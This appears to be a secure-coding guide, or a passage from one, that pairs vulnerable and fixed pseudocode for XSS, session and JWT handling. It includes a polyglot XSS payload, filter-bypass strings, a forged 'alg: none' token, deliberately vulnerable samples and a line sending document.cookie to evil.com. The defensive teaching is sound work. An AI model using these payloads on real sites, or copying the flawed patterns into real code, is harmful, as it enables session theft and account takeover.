function renderUserContent(content):
// If you only need formatted text, use markdown
markdownHtml = markdownToHtml(content) // Controlled conversion
return DOMPurify.sanitize(markdownHtml)
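Detection: Test with:
- Misnested elements (`<a><table><a>`)
- Foreign-namespace elements (`<svg>`, `<math>`, `<foreignObject>`)
- Processing instructions (`<?xml>`)
// DANGEROUS: Payloads that work in multiple contexts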
// Polyglot XSS example:
payload = "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>"
// This payload attempts to work in:
// - JavaScript context (javascript: URL)
// - HTML attribute context (onclick)
// - Inside HTML comments
// - Inside style/title/textarea/script tags
// - SVG context
// Why this matters:
// - Single payload tests multiple vectors
// - Fuzzy input handling might trigger in unexpected context
// - Copy-paste from "safe" context to unsafe context
// SECURE: Context-specific encoding, not generic filtering
function outputToContext(value, context):
switch context:
case "html_body":
return htmlEncode(value)
case "html_attribute":
return attributeEncode(value)
case "javascript_string":
return jsStringEncode(value)
case "url_parameter":
return urlEncode(value)
case "css_value":
return cssEncode(value)
default:
throw Error("Unknown context: " + context)
// Each encoder handles that specific context's dangerous characters
Detection: Use polyglot payloads in security testing to uncover context-confusion vulnerabilities.
// DANGEROUS: Incomplete encoding can be bypassed
// Bypass 1: Case variation
// Filter checks: if "<script" in input: reject
// Bypass: "<ScRiPt>alert(1)</sCrIpT>"
// Browser: case-insensitive HTML parsing
// Bypass 2: HTML entities in event handlers
// Filter: remove "javascript:"
// Input: "&#106;avascript:alert(1)"
// Browser decodes entities before processing
// Bypass 3: Null bytes
// Input: "java\x00script:alert(1)"
// Some filters/WAFs don't handle null bytes
// Some browsers ignore them
// Bypass 4: Overlong UTF-8
// Normal '<': 0x3C
// Overlong: 0xC0 0xBC (invalid UTF-8, but some parsers accept)
// Bypass 5: Mixed encoding
// Input: "%3Cscript%3Ealert(1)%3C/script%3E"
// If HTML-encoded before URL-decoded, double encoding attack
// SECURE: Encode on output, not filter on input
function secureOutput(userInput, context):
// Don't try to filter/blocklist dangerous patterns
// DO encode appropriately for the output context
// The encoding makes ALL user input safe
// regardless of what it contains
return encode(userInput, context)
// SECURE: Canonicalize THEN validate
function processInput(input):
// 1. Decode all encoding layers
decoded = fullyDecode(input) // URL, HTML entities, etc.
// 2. Normalize (lowercase, normalize unicode)
normalized = normalize(decoded)
// 3. Validate against rules
if not isValid(normalized):
reject()
// 4. Store normalized form
store(normalized)
// 5. Encode on output (later)
Key insight: Output encoding is more reliable than input filtering, because at output time you know the exact context.
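The "canonicalize, then validate" steps might look like the following in Python. This is a sketch under stated assumptions: `fully_decode` and `canonicalize` are hypothetical helpers, only URL and HTML-entity layers are handled, and the round limit of 5 is arbitrary.

```python
import html
import unicodedata
from urllib.parse import unquote

def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Strip URL and HTML-entity encoding repeatedly until the value stops changing."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")

def canonicalize(value: str) -> str:
    # NFKC folds compatibility characters (e.g. fullwidth letters) into their plain forms.
    return unicodedata.normalize("NFKC", fully_decode(value)).lower()

examples = ["%253Cscript%253E", "&lt;SCRIPT&gt;", "&#106;avascript:alert(1)"]
canonical = [canonicalize(e) for e in examples]
```

All three inputs collapse to forms that validation rules can reason about. Canonicalization supports validation only; the value still needs context-specific encoding when it is eventually written to a page.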
// DANGEROUS: HTML elements can override JavaScript globals
// How DOM clobbering works:
// Elements with id or name attributes create global variables
html = '<img id="alert">'
// Now: window.alert === <img> element
// alert(1) throws error instead of showing alert
// Exploitable clobbering:
html = '<form id="document"><input name="cookie" value="fake"></form>'
// document.cookie might now reference the input element
// Attack on sanitizer output:
html = '<a id="cid" name="cid" href="javascript:alert(1)">'
// If code does: location = document.getElementById(cid)
// Attacker controls the navigation
// More dangerous patterns:
html = '<form id="x"><input id="y"></form>'
// x.y now references the input
// Chains allow deep property access
// SECURE: Avoid global lookups for security-sensitive operations
function getConfigValue(key):
// DON'T: return window[key]
// DON'T: return document.getElementById(key).value
// DO: Use a namespaced config object
return APP_CONFIG[key]
// SECURE: Use unique prefixes for security-critical IDs
function getElementById(id):
// Prefix with app-specific namespace
return document.getElementById("app__" + id)
// SECURE: Validate types after DOM queries
function getFormElement(id):
element = document.getElementById(id)
if element instanceof HTMLFormElement:
return element
throw Error("Expected form element")
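Detection: Test with:
- Elements whose IDs match global names (`alert`, `name`, `location`)
- Form inputs named after document properties (`cookie`, `domain`)
// DANGEROUS: Single encoding for multiple contexts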
function saveUserProfile(name, bio):
// Encoding once at input time
safeName = htmlEncode(name)
safeBio = htmlEncode(bio)
database.save({name: safeName, bio: safeBio})
function displayProfile(user):
// HTML context - HTML encoding was correct
htmlOutput = "<h1>" + user.name + "</h1>" // OK
// But JavaScript context needs different encoding!
jsOutput = "<script>var name = '" + user.name + "';</script>"
// If name contained single quotes: "O'Brien" -> already encoded as "O&#x27;Brien"
// Now in JS context, &#x27; is literal text, not a quote escape
// And URL context is wrong too!
urlOutput = "/profile?name=" + user.name
// HTML entities in URL don't encode properly
// SECURE: Store raw data, encode on output
function saveUserProfile(name, bio):
// Store raw (unencoded) user input
database.save({name: name, bio: bio})
function displayProfile(user):
// Encode specifically for each output context
htmlName = htmlEncode(user.name)
jsName = jsStringEncode(user.name)
urlName = urlEncode(user.name)
htmlOutput = "<h1>" + htmlName + "</h1>"
jsOutput = "<script>var name = '" + jsName + "';</script>"
urlOutput = "/profile?name=" + urlName
Rule: Store raw data. Encode at output time, for the specific context.
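A compact Python sketch of per-context encoding, using only the standard library. The `encode_for` dispatcher and its context names are assumptions chosen to mirror the pseudocode; the JavaScript branch relies on `json.dumps` producing a quoted string literal and then escapes the characters an HTML parser would react to.

```python
import html
import json
from urllib.parse import quote

def encode_for(context: str, value: str) -> str:
    """Encode one raw value for one specific output context."""
    if context in ("html_body", "html_attribute"):
        return html.escape(value, quote=True)
    if context == "url_parameter":
        return quote(value, safe="")
    if context == "javascript_string":
        # json.dumps returns a double-quoted literal; the replaces keep it inert inside <script>.
        literal = json.dumps(value)
        return literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")
    raise ValueError(f"unknown context: {context}")

raw_name = "O'Brien </script>"  # stored exactly as the user typed it

html_out = "<h1>" + encode_for("html_body", raw_name) + "</h1>"
url_out = "/profile?name=" + encode_for("url_parameter", raw_name)
js_out = "<script>var name = " + encode_for("javascript_string", raw_name) + ";</script>"
```

The same raw value yields three different encodings, which is why encoding once at storage time cannot be correct for all of them.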
// DANGEROUS: Relying only on client-side protection
// Client-side sanitization
function submitComment(comment):
// Sanitize before sending to server
cleanComment = DOMPurify.sanitize(comment)
fetch("/api/comments", {
method: "POST",
body: JSON.stringify({comment: cleanComment})
})
// Problem: Attacker bypasses client-side code entirely
// Using curl, Postman, or modified browser
curlCommand = """
curl -X POST https://site.com/api/comments \\
-H "Content-Type: application/json" \\
-d '{"comment": "<script>alert(1)</script>"}'
"""
// Server trusts the input because "client sanitized it"
function handleCommentApi(request):
comment = request.body.comment
database.saveComment(comment) // Stored XSS!
// SECURE: Server-side sanitization is mandatory
function handleCommentApiSecure(request):
comment = request.body.comment
// Server-side sanitization
cleanComment = serverSideSanitize(comment)
database.saveComment(cleanComment)
function displayComment(comment):
// Still encode on output (defense in depth)
return htmlEncode(comment)
// NOTE: Client-side sanitization can still be useful for:
// - Preview functionality
// - Reducing server load
// - Better UX feedback
// But it must NEVER be the only protection
Rule: Server-side encoding and sanitization are mandatory. Client-side handling is an optional enhancement.
// DANGEROUS: Trying to block known-bad patterns
function filterXss(input):
// Block list approach
dangerous = [
"<script", "</script>",
"javascript:",
"onerror", "onload", "onclick",
"alert", "eval", "document.cookie"
]
result = input
for pattern in dangerous:
result = result.replace(pattern, "")
return result
// Bypasses:
// 1. Case: "<SCRIPT>alert(1)</SCRIPT>"
// 2. Encoding: "&#60;script&#62;alert(1)&#60;/script&#62;"
// 3. Null bytes: "<scr\x00ipt>alert(1)</scr\x00ipt>"
// 4. Other events: "onmouseover", "onfocus", "onanimationend"
// 5. Other sinks: "fetch('http://evil.com/'+document.cookie)"
// 6. New features: Future HTML/JS features not in blocklist
// DANGEROUS: Regex blocklist
function filterXssRegex(input):
// Still bypassable
if regex.match(/<script.*?>.*?<\/script>/i, input):
return ""
return input
// Bypass: "<scr<script>ipt>alert(1)</scr</script>ipt>"
// After removal: "<script>alert(1)</script>"
// SECURE: Allowlist approach
function sanitizeUsername(input):
// Only allow expected characters
if regex.match(/^[a-zA-Z0-9_-]{1,30}$/, input):
return input
throw ValidationError("Invalid username")
// SECURE: Proper encoding (makes blocklist unnecessary)
function displaySafely(input):
return htmlEncode(input) // All input is safe after encoding
Rule: Allowlist the content you expect, or encode everything. Never rely on a blocklist of dangerous patterns.
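The nested-tag bypass is easy to reproduce. The Python sketch below contrasts a single-pass removal filter (a hypothetical `strip_script_tags`) with an allowlist check and with `html.escape`.

```python
import html
import re

def strip_script_tags(value: str) -> str:
    # DANGEROUS: single-pass removal of a known-bad pattern.
    return re.sub(r"</?script>", "", value, flags=re.IGNORECASE)

USERNAME_RE = re.compile(r"[a-zA-Z0-9_-]{1,30}")

def validate_username(value: str) -> str:
    # Allowlist: accept only the characters a username is expected to contain.
    if USERNAME_RE.fullmatch(value):
        return value
    raise ValueError("invalid username")

payload = "<scr<script>ipt>alert(1)</scr</script>ipt>"
filtered = strip_script_tags(payload)  # removing the inner tags reassembles the outer ones
encoded = html.escape(payload)         # no raw "<" or ">" survives encoding
```

After filtering, the payload is a working script tag again, whereas the encoded form contains no markup at all and the allowlist simply rejects the value.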
// DANGEROUS: Assuming sanitization handles everything
function processHtml(userHtml):
// "The library handles XSS"
clean = sanitizer.sanitize(userHtml)
// But then using it unsafely:
// 1. Wrong context
return "<script>var content = '" + clean + "';</script>"
// Sanitizer cleaned HTML context, not JavaScript context
// 2. Double encoding
clean = sanitizer.sanitize(htmlEncode(userHtml))
// Now clean contains encoded entities that might decode later
// 3. Post-processing that reintroduces vulnerabilities
processed = clean.replace("[link]", "<a href='").replace("[/link]", "'>link</a>")
// Custom processing after sanitization can break safety
// SECURE: Understand what the sanitizer does
function processHtmlSecure(userHtml):
// 1. Sanitize for HTML context
cleanHtml = DOMPurify.sanitize(userHtml, {
ALLOWED_TAGS: ["p", "b", "i", "a"],
ALLOWED_ATTR: ["href"]
})
// 2. Validate URLs in allowed href attributes
dom = parseHtml(cleanHtml)
for link in dom.querySelectorAll("a[href]"):
if not isValidUrl(link.href):
link.removeAttribute("href")
// 3. Use only in HTML context
return cleanHtml
// SECURE: For JavaScript context, don't use HTML sanitizer
function embedDataInJs(data):
// JSON encoding is the appropriate "sanitizer" for JSON/JS
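return JSON.stringify(data) // Handles JSON escaping; also escape "<" as \u003C before embedding inline in <script>
Rule: Use the encoding or sanitization method that matches the context. Sanitization is context-dependent.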
// React default: Auto-escaping in JSX
function UserProfile(props):
// SAFE: React escapes by default
return (
<div>
<h1>{props.username}</h1> // Auto-escaped
<p>{props.bio}</p> // Auto-escaped
</div>
)
// DANGEROUS: dangerouslySetInnerHTML bypasses protection
function RichContent(props):
// VULNERABLE if props.html is user-controlled
return <div dangerouslySetInnerHTML={{__html: props.html}} />
// SECURE: Sanitize before using dangerouslySetInnerHTML
function RichContentSafe(props):
sanitizedHtml = DOMPurify.sanitize(props.html)
return <div dangerouslySetInnerHTML={{__html: sanitizedHtml}} />
// DANGEROUS: href with user input
function UserLink(props):
// VULNERABLE: javascript: URLs execute
return <a href={props.url}>{props.text}</a>
// SECURE: Validate URL scheme
function UserLinkSafe(props):
url = props.url
if not url.startsWith("http://") and not url.startsWith("https://"):
url = "#" // Safe fallback
return <a href={url}>{props.text}</a>
// Vue default: Auto-escaping with {{ }}
<template>
<!-- SAFE: Vue escapes interpolation -->
<h1>{{ username }}</h1>
<p>{{ bio }}</p>
</template>
// DANGEROUS: v-html bypasses protection
<template>
<!-- VULNERABLE: v-html renders raw HTML -->
<div v-html="userContent"></div>
</template>
// SECURE: Sanitize before v-html
<script>
export default {
computed: {
safeContent() {
return DOMPurify.sanitize(this.userContent)
}
}
}
</script>
<template>
<div v-html="safeContent"></div>
</template>
// DANGEROUS: Dynamic attribute binding
<template>
<!-- VULNERABLE: javascript: in href -->
<a :href="userUrl">Link</a>
</template>
// SECURE: URL validation
<script>
export default {
computed: {
safeUrl() {
return this.isValidHttpUrl(this.userUrl) ? this.userUrl : '#'
}
}
}
</script>
// Angular default: Auto-sanitization
@Component({
template: `
<!-- SAFE: Angular sanitizes -->
<h1>{{ username }}</h1>
<p>{{ bio }}</p>
`
})
// Angular [innerHTML] is semi-safe (Angular sanitizes)
@Component({
template: `
<!-- Angular sanitizes, but still risky -->
<div [innerHTML]="userContent"></div>
`
})
// DANGEROUS: Bypassing sanitization
import { DomSanitizer } from '@angular/platform-browser'
@Component({...})
class MyComponent {
constructor(private sanitizer: DomSanitizer) {}
// VULNERABLE: Bypasses Angular's sanitization
get unsafeHtml() {
return this.sanitizer.bypassSecurityTrustHtml(this.userInput)
}
}
// SECURE: Let Angular sanitize, or use additional sanitizer
@Component({...})
class MyComponentSafe {
get safeHtml() {
// Angular's default sanitization is usually sufficient
// For extra safety, pre-sanitize
return DOMPurify.sanitize(this.userInput)
}
}
// Jinja2 (Python)
// SAFE: Auto-escaping by default
<h1>{{ username }}</h1>
// DANGEROUS: |safe filter
<div>{{ user_html | safe }}</div> <!-- VULNERABLE -->
// Handlebars
// SAFE: {{ }} escapes
<h1>{{username}}</h1>
// DANGEROUS: {{{ }}} triple braces
<div>{{{user_html}}}</div> <!-- VULNERABLE -->
// EJS (Node.js)
// SAFE: <%= %> escapes
<h1><%= username %></h1>
// DANGEROUS: <%- %> raw
<div><%- user_html %></div> <!-- VULNERABLE -->
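// SECURE PATTERN: Always use escaping syntax, sanitize if HTML needed
// Jinja2
<div>{{ user_html | sanitize }}</div> <!-- Custom filter wrapping a server-side HTML sanitizer; it must return markup flagged as safe -->
// Handlebars
<div>{{sanitize user_html}}</div> <!-- Custom helper; it must return a SafeString of sanitized HTML -->
// EJS
<div><%- sanitize(user_html) %></div> <!-- Helper function; raw output is acceptable only because the value is sanitized first -->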
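- Avoid `innerHTML`, `document.write`, and similar sinks, or use them only with sanitized input.
- Prefer `textContent` over `innerHTML` wherever possible.
- Use `dangerouslySetInnerHTML`, `v-html`, `|safe`, and similar escapes only with sanitized content.

CWE References: CWE-287 (Improper Authentication), CWE-384 (Session Fixation), CWE-613 (Insufficient Session Expiration), CWE-307 (Improper Restriction of Excessive Authentication Attempts), CWE-308 (Use of Single-factor Authentication), CWE-640 (Weak Password Recovery Mechanism), CWE-1275 (Sensitive Cookie with Improper SameSite Attribute)
Priority score: 22 (Frequency: 8, Severity: 9, Detectability: 5)
Authentication and session management are among the most complex security areas in application development. AI models struggle with these patterns in particular, for several interrelated reasons:
Why AI models generate insecure authentication code:
Complexity invites shortcuts: Authentication requires coordinating multiple components: password storage, session management, token generation, cookie handling, and logout flows. To keep things simple, AI models often produce code that "works" but omits necessary security layers.
Tutorial syndrome: Training data is full of simplified authentication tutorials written to teach concepts rather than to build production systems. They typically leave out rate limiting, secure token generation, proper session invalidation, and timing-attack defenses.
JWT misunderstanding: JSON Web Tokens have become the default recommendation, but AI models frequently generate JWT implementations with serious flaws: the "none" algorithm vulnerability, weak secrets, improper validation, and insecure storage.
Framework diversity: Authentication patterns differ widely across frameworks (Passport.js, Spring Security, Django, Rails Devise, and others). AI models mix patterns from different frameworks, producing hybrid code that neither fits any one framework nor is secure.
Stateless versus stateful confusion: The shift toward stateless authentication (JWT) has left mixed patterns in the training data. AI models often combine stateless token concepts with stateful session assumptions, creating logical security gaps.
Edge-case blindness: Authentication edge cases (concurrent sessions, password reset flows, account recovery, multi-factor authentication, and OAuth state management) demand careful security reasoning that AI models cannot reliably produce.
Impact statistics: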
// VULNERABLE: Minimal password requirements
function validatePassword(password):
if length(password) < 6:
return false
return true
// VULNERABLE: Only checks length, no complexity
function registerUser(email, password):
if length(password) >= 8: // "Strong enough"
hashedPassword = hashPassword(password)
createUser(email, hashedPassword)
return success
return error("Password too short")
// VULNERABLE: Pattern allows easy-to-guess passwords
function isValidPassword(password):
// Only requires one of each - easily satisfied by "Password1!"
hasUpper = containsUppercase(password)
hasLower = containsLowercase(password)
hasNumber = containsNumber(password)
hasSpecial = containsSpecialChar(password)
if hasUpper and hasLower and hasNumber and hasSpecial:
return true
return false
// Missing: dictionary check, common password check, breach check
Why this is dangerous:
// VULNERABLE: Sequential session IDs
sessionCounter = 1000
function generateSessionId():
sessionCounter = sessionCounter + 1
return "session_" + toString(sessionCounter)
// VULNERABLE: Time-based session generation
function createSessionToken():
timestamp = getCurrentTimestamp()
return "sess_" + toString(timestamp)
// VULNERABLE: Weak random source
function generateToken():
return "token_" + toString(randomInteger(0, 999999))
// VULNERABLE: MD5 of predictable data
function createAuthToken(userId):
timestamp = getCurrentTimestamp()
return md5(toString(userId) + toString(timestamp))
// VULNERABLE: User-controlled seed
function generateSessionId(userId, email):
seed = userId + email + getCurrentDate()
return sha256(seed) // Deterministic - same inputs = same output
Why this is dangerous:
// VULNERABLE: Session ID not regenerated after login
function login(request):
email = request.body.email
password = request.body.password
user = findUserByEmail(email)
if user and verifyPassword(password, user.hashedPassword):
// Using the SAME session ID from before authentication
request.session.userId = user.id
request.session.authenticated = true
return redirect("/dashboard")
return error("Invalid credentials")
// VULNERABLE: Accepting session ID from URL parameter
function handleRequest(request):
sessionId = request.query.sessionId or request.cookies.sessionId
// Attacker can send victim: https://app.com/login?sessionId=attacker_controlled_session
session = loadSession(sessionId)
// VULNERABLE: Not invalidating session on privilege change
function promoteToAdmin(request):
user = getCurrentUser(request)
user.role = "admin"
user.save()
// Same session continues - if session was compromised before,
// attacker now has admin access
return success("You are now an admin")
Why this is dangerous:
// VULNERABLE: Decoding JWT without algorithm verification
function verifyJwt(token):
parts = token.split(".")
header = base64Decode(parts[0])
payload = base64Decode(parts[1])
// Trusting the algorithm from the token header itself!
algorithm = header.alg
if algorithm == "none":
return payload // No signature check!
signature = parts[2]
if verifySignature(payload, signature, algorithm):
return payload
return null
// VULNERABLE: Using jwt library without specifying expected algorithm
function validateToken(token):
try:
// Library may accept 'none' algorithm if token specifies it
decoded = jwt.decode(token, secretKey)
return decoded
catch:
return null
// VULNERABLE: Allowing multiple algorithms including none
function verifyToken(token, secret):
options = {
algorithms: ["HS256", "HS384", "HS512", "none"] // DANGEROUS
}
return jwt.verify(token, secret, options)
Why this is dangerous:
An attacker can set alg: "none" in the token header and remove the signature.
Exploit example:
// Original legitimate token:
// Header: {"alg":"HS256","typ":"JWT"}
// Payload: {"sub":"1234","role":"user"}
// Signature: valid_signature_here
// Attacker-modified token:
// Header: {"alg":"none","typ":"JWT"} ← Changed to "none"
// Payload: {"sub":"1234","role":"admin"} ← Changed to admin
// Signature: (empty) ← Removed
// If server trusts header.alg, this forged token is accepted as valid
// VULNERABLE: Short/guessable secret
JWT_SECRET = "secret"
// VULNERABLE: Common secrets from tutorials
JWT_SECRET = "your-256-bit-secret"
JWT_SECRET = "supersecretkey"
JWT_SECRET = "jwt-secret-key"
// VULNERABLE: Empty or null secret
function createToken(payload):
secret = getConfig("JWT_SECRET") or "" // Falls back to empty string
return jwt.sign(payload, secret, {algorithm: "HS256"})
// VULNERABLE: Secret derived from predictable data
function getJwtSecret():
return sha256(APPLICATION_NAME + "-" + ENVIRONMENT)
// If attacker knows app name and environment, they can derive the secret
// VULNERABLE: Same secret for signing and encryption
JWT_SECRET = "shared_secret_for_everything"
function signToken(payload):
return jwt.sign(payload, JWT_SECRET)
function encryptData(data):
return aesEncrypt(data, JWT_SECRET) // Key reuse vulnerability
Why this is dangerous:
// VULNERABLE: Storing JWT in localStorage
function handleLoginResponse(response):
accessToken = response.data.accessToken
refreshToken = response.data.refreshToken
// localStorage is accessible to ANY JavaScript on the page
localStorage.setItem("access_token", accessToken)
localStorage.setItem("refresh_token", refreshToken)
// Also stored user data in localStorage
localStorage.setItem("user", JSON.stringify(response.data.user))
// VULNERABLE: Retrieving token for API calls
function apiRequest(endpoint, data):
token = localStorage.getItem("access_token")
return fetch(endpoint, {
headers: {
"Authorization": "Bearer " + token
},
body: JSON.stringify(data)
})
// VULNERABLE: Token in sessionStorage (same problem)
function storeToken(token):
sessionStorage.setItem("jwt", token)
Why this is dangerous:
// VULNERABLE: JWT without expiration
function createUserToken(user):
payload = {
userId: user.id,
email: user.email,
role: user.role
// No "exp" claim!
}
return jwt.sign(payload, JWT_SECRET)
// VULNERABLE: Extremely long expiration
function generateToken(user):
payload = {
sub: user.id,
iat: now(),
exp: now() + (365 * 24 * 60 * 60) // 1 year expiration
}
return jwt.sign(payload, JWT_SECRET)
// VULNERABLE: Trusting token-provided expiration without server check
function validateToken(token):
decoded = jwt.verify(token, JWT_SECRET)
// JWT library checks exp, but server has no session to revoke
// Compromised tokens valid until natural expiration
return decoded
// VULNERABLE: No mechanism to invalidate tokens
function logout(request):
response.clearCookie("token")
return success("Logged out")
// Token is still valid! Anyone with the token can still use it
Why this is dangerous:
// SECURE: Comprehensive password validation
import commonPasswordList from "common-passwords-database"
import breachedPasswordApi from "haveibeenpwned-api"
function validatePasswordStrength(password):
errors = []
// Minimum length (NIST recommends 8+, many orgs use 12+)
if length(password) < 12:
errors.push("Password must be at least 12 characters")
// Maximum length (prevent DoS from hashing extremely long passwords)
if length(password) > 128:
errors.push("Password cannot exceed 128 characters")
// Check against common password list (10,000+ passwords)
if password.toLowerCase() in commonPasswordList:
errors.push("This password is too common")
// Check against user-specific data (optional but recommended)
// - Don't allow email prefix as password
// - Don't allow username as password
// Check against breached passwords (Have I Been Pwned API)
if await checkBreachedPassword(password):
errors.push("This password has appeared in a data breach")
if length(errors) > 0:
return { valid: false, errors: errors }
return { valid: true, errors: [] }
// SECURE: Check breached passwords using k-anonymity (no password exposure)
async function checkBreachedPassword(password):
// Hash password with SHA-1 (HIBP API requirement)
hash = sha1(password).toUpperCase()
prefix = hash.substring(0, 5)
suffix = hash.substring(5)
// Only send first 5 characters - k-anonymity preserves privacy
response = await fetch("https://api.pwnedpasswords.com/range/" + prefix)
hashes = await response.text() // Body is one "SUFFIX:COUNT" entry per line
// Check if our suffix appears in the returned hashes
for line in hashes.split("\n"):
parts = line.split(":")
if parts[0] == suffix:
return true // Password has been breached
return false
// SECURE: Password hashing with proper algorithm
function hashPassword(password):
// bcrypt with cost factor of 12 (adjust based on hardware)
// Alternatively: argon2id with recommended parameters
return bcrypt.hash(password, 12)
function verifyPassword(password, hash):
return bcrypt.compare(password, hash)
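The k-anonymity lookup in the pseudocode above can be sketched in Python with only the standard library. This is a minimal illustration, not a definitive client: the function names are hypothetical, no network call is made, and `sample_body` is a made-up response in the `SUFFIX:COUNT` per-line shape that the pseudocode parses.

```python
import hashlib


def split_sha1_for_range_query(password: str) -> tuple:
    """Return (prefix, suffix) of the uppercase SHA-1 hex digest."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    # Only the 5-character prefix would ever leave the machine.
    return digest[:5], digest[5:]


def suffix_in_range_response(suffix: str, body: str) -> bool:
    """Scan a 'SUFFIX:COUNT' per-line response body for our suffix."""
    for line in body.splitlines():
        candidate, _, _count = line.partition(":")
        if candidate.strip().upper() == suffix:
            return True
    return False


prefix, suffix = split_sha1_for_range_query("password")

# Made-up response body for illustration; a real one comes from the range endpoint.
sample_body = "0018A45C4D1DEF81644B54AB7F969B88D65:1\r\n" + suffix + ":42\r\n"
breached = suffix_in_range_response(suffix, sample_body)
```

The split keeps the comparison local: the service only ever sees the prefix, and the match against the suffix happens in the caller's process.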
Why this is secure:
// SECURE: Cryptographically random session IDs
import cryptoRandom from "secure-random-library"
function generateSessionId():
// 256 bits of cryptographically secure randomness
// Represented as 64 hex characters
randomBytes = cryptoRandom.getRandomBytes(32)
return bytesToHex(randomBytes)
// SECURE: Session creation with proper attributes
function createSession(userId):
sessionId = generateSessionId()
sessionData = {
id: sessionId,
userId: userId,
createdAt: now(),
expiresAt: now() + SESSION_DURATION, // e.g., 24 hours
lastActivityAt: now(),
ipAddress: getClientIP(),
userAgent: getUserAgent()
}
// Store in server-side session store (Redis, database, etc.)
sessionStore.save(sessionId, sessionData)
return sessionId
// SECURE: Session ID regeneration after authentication
function login(request):
email = request.body.email
password = request.body.password
user = findUserByEmail(email)
if not user:
return error("Invalid credentials") // Don't reveal if email exists
if not verifyPassword(password, user.hashedPassword):
recordFailedLogin(user.id, getClientIP())
return error("Invalid credentials")
// CRITICAL: Destroy old session and create new one
if request.session.id:
sessionStore.delete(request.session.id)
// Generate completely new session ID after authentication
newSessionId = createSession(user.id)
// Set session cookie with secure attributes
response.setCookie("session_id", newSessionId, {
httpOnly: true, // Prevent XSS access
secure: true, // HTTPS only
sameSite: "Strict", // CSRF protection
path: "/",
maxAge: SESSION_DURATION
})
return redirect("/dashboard")
// SECURE: Session regeneration on privilege change
function changeUserRole(request, newRole):
user = getCurrentUser(request)
// Change the role
user.role = newRole
user.save()
// Regenerate session to bind new privileges to fresh session
oldSessionId = request.cookies.session_id
sessionStore.delete(oldSessionId)
newSessionId = createSession(user.id)
response.setCookie("session_id", newSessionId, {
httpOnly: true,
secure: true,
sameSite: "Strict"
})
return success("Role updated")
Why this is secure:
// SECURE: JWT configuration with strict settings
JWT_CONFIG = {
secret: getEnv("JWT_SECRET"), // 256+ bit secret from environment
algorithms: ["HS256"], // Single allowed algorithm - explicit!
issuer: "myapp.example.com",
audience: "myapp-users",
expiresIn: "15m" // Short-lived access tokens
}
// SECURE: Token creation with explicit claims
function createAccessToken(user):
payload = {
sub: toString(user.id),
email: user.email,
role: user.role,
iss: JWT_CONFIG.issuer,
aud: JWT_CONFIG.audience,
iat: now(),
exp: now() + (15 * 60), // 15 minutes
jti: generateUUID() // Unique token ID for revocation
}
return jwt.sign(payload, JWT_CONFIG.secret, {
algorithm: "HS256" // Explicit algorithm
})
// SECURE: Token verification with all claims checked
function verifyAccessToken(token):
try:
decoded = jwt.verify(token, JWT_CONFIG.secret, {
algorithms: ["HS256"], // ONLY accept HS256
issuer: JWT_CONFIG.issuer,
audience: JWT_CONFIG.audience,
complete: true // Return header + payload
})
// Additional validation
if not decoded.payload.sub:
return { valid: false, error: "Missing subject" }
if not decoded.payload.role:
return { valid: false, error: "Missing role" }
// Check against token blacklist (for logout/revocation)
if await isTokenRevoked(decoded.payload.jti):
return { valid: false, error: "Token revoked" }
return { valid: true, payload: decoded.payload }
catch JwtExpiredError:
return { valid: false, error: "Token expired" }
catch JwtInvalidError as e:
return { valid: false, error: "Invalid token: " + e.message }
// SECURE: Refresh token handling
function createRefreshToken(user, sessionId):
payload = {
sub: toString(user.id),
sid: sessionId, // Bind to session for revocation
type: "refresh",
iat: now(),
exp: now() + (7 * 24 * 60 * 60), // 7 days
jti: generateUUID() // Unique token ID; the refresh and logout flows look tokens up by jti
}
token = jwt.sign(payload, JWT_CONFIG.secret + "_refresh", {
algorithm: "HS256"
})
// Store refresh token hash in database for revocation
tokenHash = sha256(token)
storeRefreshToken(user.id, sessionId, tokenHash, payload.exp)
return token
// SECURE: Refresh flow with rotation
function refreshAccessToken(refreshToken):
try:
decoded = jwt.verify(refreshToken, JWT_CONFIG.secret + "_refresh", {
algorithms: ["HS256"]
})
// Verify refresh token is still valid in database
tokenHash = sha256(refreshToken)
storedToken = getRefreshToken(decoded.sub, tokenHash)
if not storedToken or storedToken.revoked:
return { error: "Refresh token invalid or revoked" }
// Rotate refresh token (issue new one, revoke old)
revokeRefreshToken(tokenHash)
user = findUserById(decoded.sub)
newAccessToken = createAccessToken(user)
newRefreshToken = createRefreshToken(user, decoded.sid)
return {
accessToken: newAccessToken,
refreshToken: newRefreshToken
}
catch:
return { error: "Invalid refresh token" }
Why this is secure:
// SECURE: Cookie-based session with proper attributes
function setSessionCookie(response, sessionId):
response.setCookie("session_id", sessionId, {
httpOnly: true, // Cannot be accessed via JavaScript
secure: true, // Only sent over HTTPS
sameSite: "Strict", // Not sent with cross-site requests
path: "/", // Available for all paths
domain: ".myapp.com", // Scoped to main domain and subdomains
maxAge: 24 * 60 * 60 // 24 hours in seconds
})
// SECURE: JWT in cookie (not localStorage)
function setAuthCookies(response, accessToken, refreshToken):
// Access token - short lived, same-site strict
response.setCookie("access_token", accessToken, {
httpOnly: true,
secure: true,
sameSite: "Strict",
path: "/",
maxAge: 15 * 60 // 15 minutes
})
// Refresh token - limited path to reduce exposure
response.setCookie("refresh_token", refreshToken, {
httpOnly: true,
secure: true,
sameSite: "Strict",
path: "/auth/refresh", // Only sent to refresh endpoint
maxAge: 7 * 24 * 60 * 60 // 7 days
})
// SECURE: Cookie cleanup on logout
function clearAuthCookies(response):
// Set cookies with immediate expiration
response.setCookie("access_token", "", {
httpOnly: true,
secure: true,
sameSite: "Strict",
path: "/",
maxAge: 0 // Immediate expiration
})
response.setCookie("refresh_token", "", {
httpOnly: true,
secure: true,
sameSite: "Strict",
path: "/auth/refresh",
maxAge: 0
})
// SECURE: SameSite considerations for cross-origin needs
function setCookieForOAuth(response, stateToken):
// OAuth requires cookies to work across redirects
// Use Lax instead of Strict when necessary
response.setCookie("oauth_state", stateToken, {
httpOnly: true,
secure: true,
sameSite: "Lax", // Allows top-level navigation
path: "/auth/callback",
maxAge: 10 * 60 // 10 minutes for OAuth flow
})
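The cookie attributes above map directly onto a `Set-Cookie` header. The following Python sketch builds one with the standard `http.cookies` module; the helper name and the sample session ID are placeholders, and a web framework's own cookie API would normally be used instead.

```python
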